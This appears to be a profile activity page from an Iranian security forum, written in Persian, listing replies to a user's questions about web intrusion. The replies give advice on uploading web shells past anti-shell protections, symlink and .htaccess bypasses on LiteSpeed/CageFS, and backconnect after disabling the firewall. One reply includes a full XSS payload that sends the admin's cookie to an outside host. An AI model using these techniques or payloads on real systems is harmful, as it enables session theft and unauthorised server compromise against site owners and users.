با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
65 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
1
آخرین بار برد Mr_Security در اسفند 14 2020
Mr_Security یکی از رکورد داران بیشترین تعداد پسند مطالب است !
اعتبار در سایت
10 Goodدرباره Mr_Security
- تاریخ تولد 02/10/1993
Converted
-
Name
ReZa
-
Main os
Ubuntu
-
Programming language
خیر
آخرین بازدید کنندگان نمایه
بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.
-
Night-hacker شروع به دنبال کردن Mr_Security کرد
-
انجام تنظیمات سمت سرور
moghi پاسخی برای موضوع ارسال کرد برای یک Mr_Security در ( Remote File Upload ( RFU
نمیدونم چجوری دارید فایل اپلود میکنید طبق این فیلم جلو برید اپلود شل در whmcs اگر به نتیجه ای نرسیدید اعلام کنید- 9 پاسخ
-
- 3
-
-
-
انجام تنظیمات سمت سرور
moghi پاسخی برای موضوع ارسال کرد برای یک Mr_Security در ( Remote File Upload ( RFU
دوست عزیز باید موضوع شرح بدید اگر فایل اپلود می کنید اپلود میشه بعد پاک میشه ؟ .. خود انتی شلر سرور هست اگر پرمیشن اپلود فایل ندارید از پنل whmcs محدودیت ایجاد شده ... مورد اول از شلر های استفاده کنید که انتی شلر ها رو بایپس میکنه توی همین انجمن پر از این ابزار مورد دوم : 1 - میشه فایل php اپلود کرد اگر پرمشین نداشت php میتونید از منو تب قالب سایت شل را بصورت زیپ همراه با قالب سایت ایپورت کنید- 9 پاسخ
-
- 2
-
-
انجام تنظیمات سمت سرور
moghi پاسخی برای موضوع ارسال کرد برای یک Mr_Security در ( Remote File Upload ( RFU
سلام بله قبلا همچین مواردی برخورد کرده بودم قابل بایپس هستند باید نکات امنیتی رعایت کنید دلخوش به فایروال ها و .. و پلاگین های امنیتی نباشید تغییرات امنیتی بصورت دستی اعمال کنید- 9 پاسخ
-
- 3
-
-
چه جوری از این آسیب پذیری استفده کنم؟
payam99 پاسخی برای موضوع ارسال کرد برای یک Mr_Security در بخش سوال و جواب های عمومی
سلام دوست عزیز باگ اول مربوط به xss میباشد حمله Cross-site scripting یا XSS یک نوع حمله تزریق کد میباشد که در سمت کاربر اتفاق میافتد و در آن حمله کننده میتواند کد و اسکریپت مخرب خود را در قالب یک فعالیت معمولی به وبسایت تزریق کند اول کار کشیدن کوکی ادمین است این دستور اجرا کنید و خروجی را اطلاع بدهید در تاپیک <script type=“text/javascript”>document.location=“http://target.com/?c=“+document.cookie;</script> ابزار های که بصورت اتوماتیک میشود بهترین بهرمندی رو ببرید XSSer , beef xss هست در مورد باگ دوم RCE خدمتتون عرض کنم احتمال 90% خطای اسکنر می باشد طبق تجربه 😁- 6 پاسخ
-
- 2
-
-
-
Mr_Security شروع به دنبال کردن مشکل در اپلود شل، نحوه بایپس سیملینک در Litespeed - Cagefs، ایجاد بک دور به سیستم بدون داشتن Ip Public و و 5 کاربر دیگر کرد
-
question نحوه بایپس سیملینک در Litespeed - Cagefs
Request پاسخی برای موضوع ارسال کرد برای یک Mr_Security در Server Security Q/A
سلام چندین موارد هست باید تست کنید البته فکر کنم اخرین ورژن کلودلینوکس خیلی از بایپس ها رو فیکس کرده درون فولدر که سیملینک زدید رو htaccess ادیت کنید و لاین اخر htaccess اینطوری وارد کنید readmename file.txt فایل که توی سرور شورکات کردید وارد نماید اگر این روش کار کند باید تو ایندکس اف برای شما اظلاعات فایل تکست نمایش داده خواهد شد -------- روش دوم بیشتر روی سرور لایت اسپید جواب میده : توی پوشه ی ایندکس اف این اپلود کنید,این فایل دقیقا میاد با استفاده از فانکشن file_get_contents برای شما فایل ها رو سرور فراخوانی میکنه فایل پیوست شد HEADER.zip -
ایجاد بک دور به سیستم بدون داشتن Ip Public
dadvand پاسخی برای موضوع ارسال کرد برای یک Mr_Security در Shellcode
سلام برای backconnect بدون ای پی ولید باید اول توی موردم port forwarding کنید و سپس مودم رو روی حالت bridge قرار دهید و وقتی تغییرات اعمال دادید فایروال ویندوز و انتی ویروس خود را ببندید و برید سراغ backconnect -
Dextrous Infosolutions Pvt. Ltd. - Sql Injection Vulnerability
Unkn0wn پاسخی برای موضوع ارسال کرد برای یک Mr_Security در آسیب پذیری های کشف و گزارش شده
سلام و تشکر بابت اکسپلویت ها برای قشنگ تر و حرفه ای شدن کار بهتر اینجکت کامل تارگت درون اکسپلویت های که ثبت میکنید قرار دهید تشکر -
question مشکل در اینجکت کردن تارگت
alimoradi پاسخی برای موضوع ارسال کرد برای یک Mr_Security در Web Application Security Q/A
سلام دوست عزیز فکر کنم سایت بسته شده و فعال نیست که تست کنم -
امنیت لایبرافیس درمقابل مایکروسافت افیس
anonyanony پاسخی برای موضوع ارسال کرد برای یک Mr_Security در امنیت سیستم های شخصی
سلام دوتاشون از نظر امنیت ضعف های دارند LibreOffice در چندین هفته های اخیر چندین باگ با سطح دسترسی بالا داد در حال حاضر بهتر نکات امنیتی رعایت کنید و محدودسازی دسترسی و ایزوله نمودن برنامه استفاده کنید -
جمع آوری اطلاعات
TH0021 پاسخی برای موضوع ارسال کرد برای یک Mr_Security در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام بهترین ابزار که میتونم توی این حوزه بهتون معرفی کنم Maltego هست اطلاعات بصورت جامع در اختیارتون قرار میدهد قابلیت ها : People Groups of people (social networks) Companies Organizations Web sites Internet infrastructure such as: Domains DNS names Netblocks IP addresses Phrases Affiliations Documents and files These entities are linked using open source intelligence. -
security راهنمایی برای پیدا کردن کوکی ادمین سایت
dead_silyutls پاسخی برای موضوع ارسال کرد برای یک Mr_Security در ( Cross Site Scripting ( Xss
سلام دوست عزیز برای اطلاع بیشتر از نوع این حملات این مقاله را مطالعه کنید -
مشکل در اپلود شل
dead_silyutls پاسخی برای موضوع ارسال کرد برای یک Mr_Security در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام دوست عزیز در قسمتی که قصد دارید فایل اپلود کنید درون htaccess اون فولدر php رو فیلتر کرده و اجازه اپلود نمیده و منطقی هم هست و بایپس خاصی نداره در صورتی که شما بتوانید فایل htaccess خودتون اپلود کنید که مجوز اپلود php رو داشته باشه -
نفوذ به شبکه و راه مقابله ان
anonyanony پاسخی برای موضوع ارسال کرد برای یک Mr_Security در Network Security Q/A
سلام دوست عزیز بیشتر شرکن و کمپانی ها بزرگ شبکه هستند و شما اگه بخواهید وارد شبکه لوکال شوید حتما باید شل یا دسترسی به شکل ریموت داشته باشید و در غیر این صورت امکان پذیر نمی باشد مثال * برای نفوذ به شبکه راه های زیادی داره بصورت ریموت آسان ترین راه میشه گفته اسکن رنج آی پی شبکه مثال 192.168.1.1 تا .192.168.1.255 میتوانید از (متاسپلویت GUI) کمک بگیرید چو این ابزار علاوه بر اسکن رنج ای پی اکسپلویت و اسیب پذیر های روز رو بر روی شبکه تست میکند -
فایل Xls یا بد افزار
saeed22 پاسخی برای موضوع ارسال کرد برای یک Mr_Security در برنامه نویسی تحت دسکتاپ
سلام دوست عزیز برای تست این جور فایل ها و انالیز کردن بهتر است انهارو که هیچ گونه خطری هم برای شما نداشته باشد و یک آزمایشگاه امنیت برای خودتان ایجاد کنید توصیه و نظر شخصی من اینه که شما بروی سیتم خود vmware نصب کنید وروی vmware یک ویندوز بوت کنید و بهتراست که روی ویندوز جدید که روی vmware نصب کردید سندباکس استفاده کنید این فرضیه کاملا امنیت شمارو حفظ میکند و باحتی میتوانید فایل های مخرب هم باز کنید چون بصورت فیرز هست خطری برای شما ندارد در واقع میشه گفت بهترین ازمایشگاه تحلیل بدافزار تشکر -
How To Bypass Not_found_404 In Symlink
MOHAMAD-NOFOZI پاسخی برای موضوع ارسال کرد برای یک Mr_Security در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام از این شل در فیلم استفاده شده لینک داخل شل روی cgi telnet run bypass کلیک کن
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.